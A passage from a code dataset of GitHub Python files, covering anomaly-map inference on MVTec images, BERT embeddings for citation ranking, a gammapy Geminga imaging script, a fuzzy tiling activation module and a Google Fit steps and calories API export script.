transform=transform)\n\n vaild_data_loader = 
torch.utils.data.DataLoader(imagenet_data,\n batch_size=BATCH_SIZE,\n num_workers=0,\n pin_memory=True)\n return vaild_data_loader\n\n\n\n\nAUC_ALL = []\n# require_auc_plot = True\n# if require_auc_plot:\n# # auc_plt = plt.figure()\n# # plt.title('MS-SSIM Baseline')#.format(mem_size, mem_lamb, NORMAL_NUM_LIST))\n# plt.plot([0, 1], [0, 1], linestyle='--')\n# plt.xlim([-0.005, 1.005])\n# plt.ylim([-0.005, 1.005])\n# plt.xlabel('FPR')\n# plt.ylabel('TPR')\n\nall_group = None\n\n\ndef extract_patch(data_tmp):\n data_tmp = data_tmp.permute(0, 2, 3, 1, 4, 5)\n tmp = data_tmp.reshape(-1, 3, 32, 32)\n return tmp\n\n\ndef patch_score(img, generator32):\n latent_z_32 = generator32.encoder(img)\n generate_result32 = generator32(img)\n weight = 0.85\n ms_ssim_batch_wise = 1 - ms_ssim(img, generate_result32, data_range=data_range,\n size_average=True, win_size=3,\n weights=[0.0516, 0.3295, 0.3463, 0.2726])\n l1_batch_wise = l1_criterion(img, generate_result32) / data_range\n ms_ssim_l1 = weight * ms_ssim_batch_wise + (1 - weight) * l1_batch_wise\n\n diff = (latent_z_32 - generator32.c) ** 2\n dist = -1 * torch.sum(diff, dim=1) / generator32.sigma\n guass_svdd_loss = torch.mean(1 - torch.exp(dist))\n score_recon32 = float(ms_ssim_l1.cpu().detach().numpy())\n score_gsvdd32 = float(guass_svdd_loss.cpu().detach().numpy())\n anormaly_score32 = 0.9 * score_recon32 + 0.1 * score_gsvdd32\n return anormaly_score32\n\n\ndata_range = 2.1179 + 2.6400\noverall_iou = []\nfor key in category:\n NORMAL_NUM = category[key]\n print('Current Item: {}'.format(NORMAL_NUM))\n\n train_root = '/home/user/Documents/Public_Dataset/MVTec_AD/{}/train/'.format(NORMAL_NUM)\n test_root = '/home/user/Documents/Public_Dataset/MVTec_AD/{}/test/'.format(NORMAL_NUM)\n gt_root = '/home/user/Documents/Public_Dataset/MVTec_AD/{}/ground_truth/'.format(NORMAL_NUM)\n\n generator32 = twoin1Generator(64, latent_dimension=latent_dimension)\n\n from ssl_pretrain.resnet_cifar import *\n from ssl_pretrain.models import ContrastiveModel\n\n model = ContrastiveModel(resnet18(), mlp_number=2, cls_head_number=1)\n generator32.pretrain = model.backbone\n\n ckpt = torch.load('./check_points/p32/{}_32/No.{}_g.pth'.format(NORMAL_NUM, NORMAL_NUM), map_location=cuda_dev)\n generator32.load_state_dict(ckpt['model'])\n generator32.c = ckpt['c']\n generator32.sigma = ckpt['sigma']\n\n import sys\n sys.path.insert(0, '/media/user/T7 Touch/CVPR/')\n generator256 = torch.load('./check_points/p256/{}_256/No.{}_g.pth'.format(NORMAL_NUM, NORMAL_NUM), map_location=cuda_dev)\n\n # ent_criterion = NegEntropyLoss()\n\n generator32.to(device)\n generator256.to(device)\n\n generator32.eval()\n generator256.eval()\n\n y = []\n y_pred = []\n score = []\n score_recon = []\n score_gsvdd = []\n normal_mse_loss = []\n abnormal_mse_loss = []\n # train_root = '/home/user/Desktop/Deep Learning/public_data/MVTec_AD (with_vaild)/{}/train/'.format(NORMAL_NUM)\n # test_root = '/home/user/Desktop/Deep Learning/public_data/MVTec_AD (with_vaild)/{}/test/'.format(NORMAL_NUM)\n\n list_test = os.listdir(test_root)\n\n p_stride = 16\n with torch.no_grad():\n iou_list = []\n for i in range(len(list_test)):\n if list_test[i] == \"good\":\n continue\n current_defect = list_test[i]\n test_path = test_root + \"{}\".format(current_defect)\n mask_path = gt_root + \"{}\".format(current_defect)\n # valid_dataset_loader = load_test(test_path)\n test_mask_data_loader = load_test_and_mask(test_path, mask_path)\n height = 256\n width = 256\n # occ_size = 32\n # occ_stride = 16\n\n threshold = None\n 
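# unfold each 256x256 test image into 32x32 patches and build a pixel-level anomaly heatmap\n        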
ad_score_train = []\n\n for index, (images, img_label, mask, mask_label) in enumerate(test_mask_data_loader):\n # img = images.to(device)\n img_whole = images.to(device)\n img_tmp = img_whole.unfold(2, 32, p_stride).unfold(3, 32, p_stride)\n # img_tmp = img_whole.unfold(2, 32, 16).unfold(3, 32, 16)\n img = extract_patch(img_tmp)\n # heatmap = torch.zeros((1, 1, 256, 256))\n ############################################################################################\n # 32\n ############################################################################################\n # for index in range(img.shape[0]):\n latent_z_32 = generator32.encoder(img)\n generate_result32 = generator32(img)\n weight = 0.85\n _, residual_map = ms_ssim(img, generate_result32, data_range=data_range,\n size_average=True, win_size=3,\n weights=[0.0516, 0.3295, 0.3463, 0.2726])\n ms_ssim_batch_wise1 = 1 - F.interpolate(residual_map[0], size=32)\n ms_ssim_batch_wise2 = 1 - F.interpolate(residual_map[1], size=32)\n ms_ssim_batch_wise3 = 1 - F.interpolate(residual_map[2], size=32)\n ms_ssim_batch_wise4 = 1 - F.interpolate(residual_map[3], size=32)\n ms_ssim_batch_wise = ms_ssim_batch_wise1 * 0.0516 + \\\n ms_ssim_batch_wise2 * 0.3295 + \\\n ms_ssim_batch_wise3 * 0.3463 + \\\n ms_ssim_batch_wise4 * 0.2726\n\n l1_batch_wise = torch.abs(img - generate_result32) / data_range\n ms_ssim_l1 = F.relu_(weight * ms_ssim_batch_wise + (1 - weight) * l1_batch_wise)\n heatmap32 = heat_map_printer(ms_ssim_l1, img_whole, mask, plot=True)\n\n\n ############################################################################################\n # 256\n ############################################################################################\n latent_z_256 = generator256.encoder(img_whole)\n generate_result256 = generator256(img_whole)\n _, residual_map256 = ms_ssim(img_whole, generate_result256, data_range=data_range,\n size_average=True, win_size=11,\n weights=[0.0448, 0.2856, 0.3001, 0.2363, 0.1333])\n ms_ssim_batch_wise1 = 1 - F.interpolate(residual_map256[0], size=256)\n ms_ssim_batch_wise2 = 1 - F.interpolate(residual_map256[1], size=256)\n ms_ssim_batch_wise3 = 1 - F.interpolate(residual_map256[2], size=256)\n ms_ssim_batch_wise4 = 1 - F.interpolate(residual_map256[3], size=256)\n ms_ssim_batch_wise5 = 1 - F.interpolate(residual_map256[4], size=256)\n ms_ssim_batch_wise = ms_ssim_batch_wise1 * 0.0448 + \\\n ms_ssim_batch_wise2 * 0.2856 + \\\n ms_ssim_batch_wise3 * 0.3001 + \\\n ms_ssim_batch_wise4 * 0.2363 + \\\n ms_ssim_batch_wise5 * 0.1333\n\n l1_batch_wise = torch.abs(img_whole - generate_result256) / data_range\n heatmap256 = F.relu_(weight * ms_ssim_batch_wise + (1 - weight) * l1_batch_wise)\n heatmap256 = heatmap256.cpu().detach().numpy().squeeze(0)\n heatmap256 = numpy.transpose(heatmap256, (1, 2, 0)).squeeze().astype(numpy.float32)\n heatmap256 = rgb2gray(heatmap256)\n # heatmap256 = heat_map_printer(ms_ssim_l1, img_whole, mask, threshold=0.5)\n\n ############################################################################################\n # MULTI-SCALE\n ############################################################################################\n heatmap = 0.5 * heatmap32 + 0.5 * heatmap256\n\n SHOW_HEATMAP = heatmap.copy()\n plt.imshow(SHOW_HEATMAP, cmap=\"jet\", interpolation='none')\n plt.colorbar()\n plt.axis('off')\n plt.savefig(\"../HEATMAP/heatmap.png\")\n\n gt_mask = mask.cpu().detach().numpy().squeeze(0)\n gt_mask = numpy.transpose(gt_mask, (1, 2, 0)).squeeze().astype(numpy.int)\n\n inter_sum = heatmap + gt_mask\n 
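# legacy IoU bookkeeping; the pixel-level AUC computed below is what gets reported\n            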
inter_sum[inter_sum != 2] = 0\n            inter_sum[inter_sum == 2] = 1\n            intersection = numpy.sum(inter_sum)\n\n            union_sum = heatmap + gt_mask\n            union_sum[union_sum != 0] = 1\n            union = numpy.sum(union_sum)\n            # iou = intersection / union\n\n            auc = metrics.roc_auc_score(gt_mask.reshape(-1), heatmap.reshape(-1))\n            iou_list.append(auc)\n\n        avg_iou = sum(iou_list)/len(iou_list)\n        print(\"{} AUC:{}\".format(NORMAL_NUM, avg_iou))\n        overall_iou.append(avg_iou)\n\naverage_iou_all_class = sum(overall_iou) / len(overall_iou)\nprint(\"Overall PIXEL-LEVEL AUC: {}\".format(average_iou_all_class))\n","repo_name":"tianyu0207/IGD","sub_path":"multi_scale/inference_loc.py","file_name":"inference_loc.py","file_ext":"py","file_size_in_byte":15186,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"72"}
+{"seq_id":"31503272478","text":"import json\nimport pickle\nimport sys\n\nimport torch\nimport os,sys,inspect\ncurrent_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparent_dir = os.path.dirname(current_dir)\nsys.path.insert(0, parent_dir)\nfrom gnlputils import extract_keys, split_data, cosine_similarity, get_from_rankings\n\nfrom pytorch_pretrained_bert import BertTokenizer, BertModel\nfrom tqdm import tqdm\n\nWORD_EMBEDDINGS_TRAIN = 'complete_bert_embeddings_train_titles.pk'\nWORD_EMBEDDINGS_EVAL = 'complete_bert_embeddings_eval_titles.pk'\n\n\ndef take_mean_bert(vector):\n    return torch.mean(vector[0], dim=0)\n\n\ndef bert(abstract, tokenizer, model):\n    # Tokenized input\n    tokenized_text = tokenizer.tokenize(abstract)\n    if len(tokenized_text) > 512:\n        tokenized_text = tokenized_text[:512]\n\n    # Convert token to vocabulary indices\n    indexed_tokens = tokenizer.convert_tokens_to_ids(tokenized_text)\n    # Convert inputs to PyTorch tensors\n    tokens_tensor = torch.tensor([indexed_tokens])\n\n    # If you have a GPU, put everything on cuda\n    if torch.cuda.is_available():\n        with torch.cuda.device(1):  # NOTE: change this to select which GPU device is used\n            tokens_tensor = tokens_tensor.cuda()\n            model = model.cuda()\n\n    # Predict hidden states features for each layer\n    with torch.no_grad():\n        encoded_layers, _ = model(tokens_tensor)\n    # We have a hidden state for each of the 12 layers in model bert-base-uncased\n    return encoded_layers[11]\n\n\ndef generate_word_embeddings(papers):\n    lines = []\n    with open(papers, 'rb') as f:\n        for line in tqdm(f):\n            lines.append(json.loads(line))\n\n    lines.sort(key=lambda x: x['year'])\n\n    ids = extract_keys(lines, 'id')\n    abstracts = extract_keys(lines, 'paperAbstract')\n    titles = extract_keys(lines, 'title')\n    out_citations = extract_keys(lines, 'outCitations')\n\n    # TODO: DO NOT HARDCODE THIS\n    is_test = False\n\n    train_ids, eval_ids = split_data(ids, 0.8, 0.9, is_test)\n    train_abstracts, eval_abstracts = split_data(abstracts, 0.8, 0.9, is_test)\n    train_titles, eval_titles = split_data(titles, 0.8, 0.9, is_test)\n    train_out_citations, eval_out_citations = split_data(out_citations, 0.8, 0.9, is_test)\n\n    tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\n    model = BertModel.from_pretrained('bert-base-uncased')\n    model.eval()\n\n    eval_score = []\n    matching_citation_count = 1\n    min_rank = float(\"inf\")\n    # TODO: changing train_abstracts -> train_titles\n    for abstract in tqdm(train_titles, desc='Extracting embeddings for training set'):\n        with open(WORD_EMBEDDINGS_TRAIN, 'ab') as handle:\n            if abstract:\n                abstract = abstract.lower()\n                word_embedding = take_mean_bert(bert(abstract, tokenizer, 
model))\n                pickle.dump(word_embedding, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n    # TODO: changing eval_abstracts -> eval_titles\n    for i, abstract in tqdm(enumerate(eval_titles[:2]), desc='Extracting embeddings for evaluation set'):\n        if abstract:\n            abstract = abstract.lower()\n            word_embedding_eval = take_mean_bert(bert(abstract, tokenizer, model))\n            with open(WORD_EMBEDDINGS_EVAL, 'ab') as f:\n                pickle.dump(word_embedding_eval, f, protocol=pickle.HIGHEST_PROTOCOL)\n\n            with open(WORD_EMBEDDINGS_TRAIN, 'rb') as handle:\n                rankings = []\n                try:\n                    train_index = 0\n                    while True:\n                        word_embedding_train = pickle.load(handle)\n                        score = cosine_similarity(word_embedding_eval.cpu(), word_embedding_train.cpu())\n                        rankings.append((score, train_index))\n                        train_index += 1\n                except EOFError:\n                    handle.seek(0)\n            rankings.sort(key=lambda x: x[0], reverse=True)\n\n            out_citations = eval_out_citations[i]\n            if len(out_citations):\n                # gets the rankings of the training papers in the correct order\n                ranking_ids = get_from_rankings(rankings, train_ids)\n                true_citations = [citation for citation in ranking_ids if citation in out_citations]\n\n                if len(true_citations):\n                    matching_citation_count += 1\n                    rank = ranking_ids.index(true_citations[0]) + 1\n                    min_rank = min(min_rank, rank)\n                    eval_score.append(1.0 / rank)\n\n    print(\"Matching citation count = {0}\".format(str(matching_citation_count)))\n    print(eval_score)\n    print(\"Min rank = {0}\".format(str(min_rank)))\n    print(sum(eval_score) / matching_citation_count)\n\n\ndef main():\n    generate_word_embeddings(sys.argv[1])\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"mitalipalekar/GatesNLP","sub_path":"src/bert/bert_embeddings.py","file_name":"bert_embeddings.py","file_ext":"py","file_size_in_byte":4866,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
+{"seq_id":"42755413263","text":"import matplotlib.pyplot as plt\nimport gammapy\nimport numpy as np\nimport astropy\nimport regions\nimport sherpa\nimport uncertainties\nimport photutils\n\nimport astropy.units as u\nfrom astropy.coordinates import SkyCoord, Angle\nfrom regions import CircleSkyRegion\nfrom photutils.detection import find_peaks\nfrom gammapy.data import DataStore\nfrom gammapy.spectrum import (SpectrumExtraction,SpectrumFit,SpectrumResult,models,SpectrumEnergyGroupMaker,FluxPointEstimator)\nfrom gammapy.image import SkyImage, IACTBasicImageEstimator\nfrom gammapy.background import RingBackgroundEstimator, ReflectedRegionsBackgroundEstimator\nfrom gammapy.utils.energy import EnergyBounds\nfrom gammapy.detect import TSImageEstimator\n\nfrom gammapy.catalog import SourceCatalog2FHL\nfrom astropy.convolution import Ring2DKernel, Tophat2DKernel\nfrom astropy.visualization import simple_norm\n\nfrom gammapy.data import DataStore\nfrom gammapy.image import SkyImage, SkyImageList\nfrom gammapy.detect import KernelBackgroundEstimator as KBE\n\n######## create a logger to suppress the verbose output\nimport logging \nlogging.basicConfig()\nlog = logging.getLogger('gammapy.spectrum')\nlog.setLevel(logging.ERROR)\nprint(\"\\nlog created\")\n\ndef show_image(image, radius=3, vmin=0, vmax=3,name='geminga'):\n    \"\"\"Little helper function to show the images for this application here.\"\"\"\n    image.smooth(radius=radius).show(vmin=vmin, vmax=vmax, add_cbar=True)\n    image.cutout(position=SkyCoord.from_name(name,frame='galactic'),size=(2*u.deg, 3*u.deg)).smooth(radius=radius).show(vmin=vmin, vmax=vmax, add_cbar=True)\n\n\n\nprint(\"\\n\")\nprint(\"CHECK PACKAGE VERSION 
########\")\nprint('gammapy:', gammapy.__version__)\nprint('numpy:', np.__version__)\nprint('astropy:', astropy.__version__)\nprint('regions:', regions.__version__)\nprint('sherpa:', sherpa.__version__)\nprint('uncertainties:', uncertainties.__version__)\nprint('photutils:', photutils.__version__)\nprint(\"##############################\\n\")\n\n### put \"all\" in place of \"gps\", or change \"all\" to the extragalactic survey\n\ndata_store = DataStore.from_dir('/Users/lucatosti/Desktop/GEMINGA/1dc/index/gps') #### general database-like object for coordinates\n#data_store = DataStore.from_dir('$GAMMAPY_EXTRA/datasets/hess-crab4-hd-hap-prod2/')\ndata_store.info() \n\nshow_it=True\n\n# general selection of observations ---->>> SkyCoord.from_name('crab') also works directly --->>> use geminga\n\n# from astropy.coordinates import SkyCoord\n# table = data_store.obs_table\n# pos_obs = SkyCoord(table['GLON_PNT'], table['GLAT_PNT'], frame='galactic', unit='deg')\n# pos_target = SkyCoord(0, 0, frame='galactic', unit='deg')\n# offset = pos_target.separation(pos_obs).deg\n# mask = (1 < offset) & (offset < 2)\n# table = table[mask]\n# table.show_in_browser(jsviewer=True)\n\n\"\"\"\nobs_id = [110380, 111140, 111159]\nobs_list = data_store.obs_list(obs_id) ### modify to build the complete list\n                                       ### apply a filter -> keep only observations of Geminga\n\n#print('##########')\nprint(obs_list)\n#print('##########')\n\nobs_cols = ['OBS_ID', 'GLON_PNT', 'GLAT_PNT', 'LIVETIME']\n#table_orig=data_store.obs_table.select_obs_id(obs_id)[obs_cols]\n\ntable = data_store.obs_table[obs_cols]\n\nobs_list2 = data_store.obs_list(table['OBS_ID'])\n#print(obs_list2)\n\npos_obs = SkyCoord(table['GLON_PNT'], table['GLAT_PNT'], frame='galactic', unit='deg')\n#target_position = SkyCoord(0, 0, unit='deg', frame='galactic')\n#pos_target = SkyCoord(0,0,unit='deg',frame='galactic')\npos_target = SkyCoord.from_name('geminga',frame='galactic')\nprint(pos_target)\noffset = pos_target.separation(pos_obs).deg\nbool1= (1 < offset) \nbool2= (offset < 1.001)\n#bool3= (table['OBS_ID']==110380 | table['OBS_ID']== 111140 | table['OBS_ID']==111159)\nmask= bool1 & bool2\ntable = table[mask]\ntable.show_in_browser(jsviewer=True)\n\n#print(table_orig)\n#print(table)\n\non_radius = 0.2 * u.deg\non_region = CircleSkyRegion(center=pos_target, radius=on_radius)\n\n\n# Define reference image centered on the target\nxref = pos_target.galactic.l.value\nyref = pos_target.galactic.b.value\nsize = 10 * u.deg\nbinsz = 0.02 # degree per pixel\nnpix = int((size / binsz).value)\n\nref_image = SkyImage.empty(\n    nxpix=800, nypix=600, binsz=0.02,\n    xref=xref, yref=yref,\n    proj='TAN', coordsys='GAL',\n)\n\nprint(ref_image)\n\n\nexclusion_mask = ref_image.region_mask(on_region) #### create a circular mask for the background estimate\nexclusion_mask.data = 1 - exclusion_mask.data\nexclusion_mask.plot() #### it refuses to plot\n\nbkg_estimator = RingBackgroundEstimator(\n    r_in=0.5 * u.deg,\n    width=0.2 * u.deg,\n)\nimage_estimator = IACTBasicImageEstimator(\n    reference=ref_image,\n    emin=100 * u.GeV,\n    emax=100 * u.TeV,\n    #offset_max=3 * u.deg,\n    background_estimator=bkg_estimator,\n    exclusion_mask=exclusion_mask,\n)\n\n\"\"\"\n## something is wrong with the images -> drop the whole gammapy tutorial and try:\n\n\"\"\"NOT THIS ONE, FOR GOODNESS' SAKE\nimages = image_estimator.run(obs_list2)\n\n\nimages.names\nshow_image(images['counts'], radius=0, vmax=10)\nshow_image(images['counts'], vmax=5)\nshow_image(images['background'], vmax=4)\nshow_image(images['excess'], 
vmax=2)\n\n\"\"\"\n#110380, 111140, 111159\n\n#source_pos = SkyCoord.from_name('geminga',frame='galactic')#(83.633083, 22.0145, unit='deg')\n# If you have internet access, you could also use this to define the `source_pos`:\n#source_pos = SkyCoord.from_name('crab')\nsource_pos = SkyCoord(0, 0, unit='deg',frame='galactic')\n#source_pos = SkyCoord.from_name('crab')\nprint(source_pos)\n\nref_image = SkyImage.empty(\n    nxpix=800, nypix=800, binsz=0.02,\n    #xref=source_pos.ra.deg, yref=source_pos.dec.deg,\n    xref=source_pos.l.deg , yref=source_pos.b.deg,\n    coordsys='GAL', proj='TAN', #coordsys='CEL'\n)\nprint(\"1\")\n#events = data_store.obs(obs_id=23523).events###110380\nevents = data_store.obs(obs_id=110380).events\ncounts_image = SkyImage.empty_like(ref_image)\ncounts_image.fill_events(events)\n\n\nnorm = simple_norm(counts_image.data, stretch='sqrt', min_cut=0, max_cut=0.3)#0.3\nq1=counts_image.smooth(radius=0.1 * u.deg).plot(norm=norm, add_cbar=True)\nq=counts_image.cutout(position=SkyCoord(-5, 0, unit='deg', frame='galactic'),size=(20*u.deg, 20*u.deg)).smooth(radius=0.1 * u.deg).plot(norm=norm, add_cbar=True)\n#plt.show(counts_image)\nif(show_it==False):\n    plt.show(q)\n    \n#obs_ids = [23523, 23526] ###[111140, 111159]\nobs_ids = [110380,111140, 111159]\ncounts_image2 = SkyImage.empty_like(ref_image)\nfor obs_id in obs_ids:\n    events = data_store.obs(obs_id=obs_id).events\n    counts_image2.fill_events(events)\n\nnorm = simple_norm(counts_image2.data, stretch='sqrt', min_cut=0, max_cut=0.5)#0.5\ncounts_image2.smooth(radius=0.1 * u.deg).plot(norm=norm, add_cbar=True)\n\n\nq2=counts_image2#.cutout(position=SkyCoord(0, 0, unit='deg', frame='galactic'),size=(10*u.deg, 10*u.deg)).plot(norm=norm, add_cbar=True)\nif(show_it==False):\n    plt.show(q2)\n\n\nprint(\"2\")\n\n\n################ HERE IS THE BACKGROUND COMPUTATION\n\n\nsource_kernel = Tophat2DKernel(radius=5)#5\nsource_kernel.normalize(mode='peak')\nsource_kernel = source_kernel.array\n\nbackground_kernel = Ring2DKernel(radius_in=5, width=20)#20-10\nbackground_kernel.normalize(mode='peak')\nbackground_kernel = background_kernel.array\n\n\na = plt.imshow(source_kernel, interpolation='nearest', cmap='gray')\nplt.colorbar()\nplt.grid('off')\nif(show_it==False):\n    plt.show(a)\n\nb = plt.imshow(background_kernel, interpolation='nearest', cmap='gray')\nplt.colorbar()\nplt.grid('off')\nif(show_it==False):\n    plt.show(b)\n# To use the `KernelBackgroundEstimator` you first have to set\n# up a source and background kernel and put the counts image input\n# into a container `SkyImageList` class.\nimages = SkyImageList()\nimages['counts'] = counts_image2\n\nprint(\"3\")\n\nkbe = KBE(\n    kernel_src=source_kernel,\n    kernel_bkg=background_kernel,\n    significance_threshold=5,\n    mask_dilation_radius=0.06 * u.deg,\n)\n# This takes about 10 seconds on my machine\nresult2 = kbe.run(images)\nprint(\"results2\")\nprint(result2.names)\n#### another way to estimate the background\n\nobs_list = data_store.obs_list(obs_ids)\ntarget_position = SkyCoord(0, 0, unit='deg', frame='galactic')\non_radius = 0.3 * u.deg\non_region = CircleSkyRegion(center=target_position, radius=on_radius)\n\nexclusion_mask = ref_image.region_mask(on_region)\nexclusion_mask.data = 1 - exclusion_mask.data\nbkg_estimator = RingBackgroundEstimator(\n    r_in=0.5 * u.deg,\n    width=0.2 * u.deg,\n)\nimage_estimator = IACTBasicImageEstimator(\n    reference=ref_image,\n    emin=100 * u.GeV,\n    emax=100 * u.TeV,\n    #offset_max=3 * u.deg,\n    background_estimator=bkg_estimator,\n    exclusion_mask=exclusion_mask,\n)\n
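# run the IACT basic image estimator over the selected observations\n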
images_new = image_estimator.run(obs_list)\nprint(\"\\n\\n\\n\")\nprint(images_new.names)\nprint(result2.names)\nprint(\"\\n\\n\\n\")\n# Let's have a look at the background image and the exclusion mask\n\n# This doesn't work yet ... need to do SkyImage.plot fixes:\n# fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(10, 3))\n# background_image.plot(ax=axes[0])\n# exclusion_image.plot(ax=axes[1])\n# significance_image.plot(ax=axes[2])\nprint(\"bkg method 1\")\nbackground_image = result2['background']\nbackground_image2 = images_new['background']\nnorm = simple_norm(background_image.data, stretch='sqrt', min_cut=0, max_cut=0.5)\nbackground_image.plot(norm=norm, add_cbar=True)\nif(show_it==False):\n    plt.show(background_image.plot(norm=norm, add_cbar=True))\nnorm2 = simple_norm(background_image2.data, stretch='sqrt', min_cut=0, max_cut=0.5)\nbackground_image2.plot(norm=norm, add_cbar=True)\nprint(\"bkg method 2\")\nif(show_it==False):\n    plt.show(background_image2.plot(norm=norm, add_cbar=True))\n    plt.show(background_image.cutout(position=SkyCoord(0, 0, unit='deg', frame='galactic'),size=(2*u.deg, 2*u.deg)))\nresult2['exclusion'].plot()\nif(show_it==True):\n    plt.show(result2['exclusion'].plot())\n    plt.show(result2['background'].plot())\n    plt.show(images_new['background'].plot())\n    plt.show(result2['background'].cutout(position=SkyCoord(0, 0, unit='deg', frame='galactic'),size=(2*u.deg,2*u.deg)).plot())\n    plt.show(images_new['background'].cutout(position=SkyCoord(0, 0, unit='deg', frame='galactic'),size=(2*u.deg, 2*u.deg)).plot())\n\nsignificance_image = result2['significance']\nc=significance_image.cutout(position=SkyCoord(0, 0, unit='deg', frame='galactic'),size=(2*u.deg, 5*u.deg)).plot(add_cbar=True, vmin=0, vmax=20)\nif(show_it==False):\n    plt.show(c)\nprint(\"4\")\nif(show_it==False):\n    plt.show(images_new['psf'].plot())\n    plt.show(images_new['excess'].cutout(position=SkyCoord(0, 0, unit='deg', frame='galactic'),size=(2*u.deg, 2*u.deg)).plot())\n","repo_name":"ltostirepository/prova","sub_path":"gammapy/geminga.py","file_name":"geminga.py","file_ext":"py","file_size_in_byte":10466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"23461754284","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n# Source: https://github.com/hwang-ua/fta_pytorch_implementation/blob/main/core/lta.py\nclass FTA(nn.Module):\n    def __init__(self, input_dim, tiles=20, bound_low=-2, bound_high=2, eta=0.2):\n        super(FTA, self).__init__()\n        # 1 tiling, binning\n        self.n_tilings = 1\n        self.n_tiles = tiles\n        self.bound_low, self.bound_high = bound_low, bound_high\n        self.delta = (self.bound_high - self.bound_low) / self.n_tiles\n        c_mat = torch.as_tensor(np.array([self.delta * i for i in range(self.n_tiles)]) + self.bound_low, dtype=torch.float32)\n        self.register_buffer('c_mat', c_mat)\n        self.eta = eta\n        self.d = input_dim\n\n    def forward(self, reps):\n        temp = reps\n        temp = temp.reshape([-1, self.d, 1])\n        onehots = 1.0 - self.i_plus_eta(self.sum_relu(self.c_mat, temp))\n        out = torch.reshape(torch.reshape(onehots, [-1]), [-1, int(self.d * self.n_tiles * self.n_tilings)])\n        return out\n\n    def sum_relu(self, c, x):\n        out = F.relu(c - x) + F.relu(x - self.delta - c)\n        return out\n\n    
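# fuzzy indicator I+eta: identity for x <= eta, saturates to 1 for x > eta (eta=0 gives a hard bin)\n    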
out","repo_name":"ejmejm/RL-Representation","sub_path":"src/rl_cookbook/models/activations.py","file_name":"activations.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"1523443145","text":"# Import necessary libraries\nimport json\nimport pandas as pd\nfrom datetime import datetime\nimport requests\n\n# Defining the api urls for steps and calories data\nbaseurl_steps = 'https://www.googleapis.com/fitness/v1/users/me/dataSources/derived:com.google.step_count.delta:com.google.android.gms:merge_step_deltas/datasets/1532476800000000000-1633345410000000000'\nbaseurl_calories = 'https://www.googleapis.com/fitness/v1/users/me/dataSources/derived:com.google.calories.expended:com.google.android.gms:merge_calories_expended/datasets/1532476800000000000-1633345410000000000'\n\n# Specify certain parameters needed to retrieve api calls\nparams = {\n \"access_token\": \"Enter token here\",\n \"scope\": \"https://www.googleapis.com/auth/fitness.activity.read\",\n \"token_type\": \"Bearer\",\n \"expires_in\": 3599,\n \"refresh_token\": \"Enter refresh token here\"\n}\n\n\n# Response function returns a JSON output and writes it to a file\ndef response(url, filename):\n response = requests.get(url, params=params)\n response_json = response.json()\n open_file = open(filename, 'w')\n open_file.write(json.dumps(response_json, indent=4))\n open_file.close()\n return 'JSON was written to the specified file'\n\n\n# Writing the json output to a specified file\nresponse(baseurl_steps, 'Steps_googlefit.json')\nresponse(baseurl_calories, 'Calories_googlefit.json')\n\n# Reading the files and loading it as a JSON to query results\ndata_calorie = open('Calories_googlefit.json').read()\ndata_steps = open('Steps_googlefit.json').read()\ndata_weight = open('Body weight user inputted.json').read()\ndata_height = open('Body height user inputted.json').read()\nopenjson_calories, openjson_steps, openjson_weight, openjson_height = json.loads(\n data_calorie), json.loads(data_steps), json.loads(data_weight), json.loads(data_height)\n\n# Defining lists for storing the data\nlist_of_lists_calories = []\nlist_of_lists_steps = []\n\n# Querying the calorie information\nfor rows in openjson_calories['point']:\n list_of_indi_calories = []\n\n def values(tag):\n return rows[tag]\n\n calories_startime, calories_endtime = values(\n \"startTimeNanos\"), values(\"endTimeNanos\")\n calories = rows[\"value\"][0][\"fpVal\"]\n\n int_starttime_calories, int_endtime_calories = int(\n calories_startime)//1000000000, int(calories_endtime)//1000000000\n\n starttime_calories = datetime.fromtimestamp(\n int_endtime_calories).strftime('%Y-%m-%d %H:%M:%S')\n\n endtime_calories = datetime.fromtimestamp(\n int_endtime_calories).strftime('%Y-%m-%d %H:%M:%S')\n\n # Storing the calories columns in a list\n list_of_indi_calories.append(starttime_calories)\n list_of_indi_calories.append(endtime_calories)\n list_of_indi_calories.append(calories)\n list_of_lists_calories.append(list_of_indi_calories)\n\n# Querying the steps information\nfor rows_steps in openjson_steps['point']:\n list_of_indi_steps = []\n\n def values_steps(tag):\n return rows_steps[tag]\n steps_startime, steps_endtime = values_steps(\n \"startTimeNanos\"), values_steps(\"endTimeNanos\")\n steps = rows_steps[\"value\"][0][\"intVal\"]\n steps_int_starttime, steps_int_endtime = int(\n steps_startime)//1000000000, int(steps_endtime)//1000000000\n starttime_steps = datetime.fromtimestamp(\n 
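# --- Hedged usage sketch for the FTA module defined above (assumes the FTA
# class is in scope and torch is installed). Each scalar input expands into
# `tiles` soft one-hot bins, so the output width is input_dim * tiles.
import torch

fta = FTA(input_dim=4, tiles=20, bound_low=-2, bound_high=2, eta=0.2)
x = torch.randn(8, 4)                    # batch of 8 four-dim inputs
y = fta(x)
assert y.shape == (8, 4 * 20)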
steps_int_starttime).strftime('%Y-%m-%d %H:%M:%S')\n endtime_steps = datetime.fromtimestamp(\n steps_int_endtime).strftime('%Y-%m-%d %H:%M:%S')\n\n # Storing the steps columns in a list\n list_of_indi_steps.append(starttime_steps)\n list_of_indi_steps.append(endtime_steps)\n list_of_indi_steps.append(steps)\n list_of_lists_steps.append(list_of_indi_steps)\n\n\n# Converting the lists into pandas dataframe\ndf_calories = pd.DataFrame(list_of_lists_calories, columns=[\n \"starttime_calories\", \"endtime_calories\", \"calories\"])\ndf_steps = pd.DataFrame(list_of_lists_steps, columns=[\n \"starttime_steps\", \"endtime_steps\", \"steps\"])\n\n# Storing the dataframe in csv files\ndf_calories.to_csv('calories.csv')\ndf_steps.to_csv('steps.csv')\n","repo_name":"inspiration07/MyFitness","sub_path":"Googlefit API.py","file_name":"Googlefit 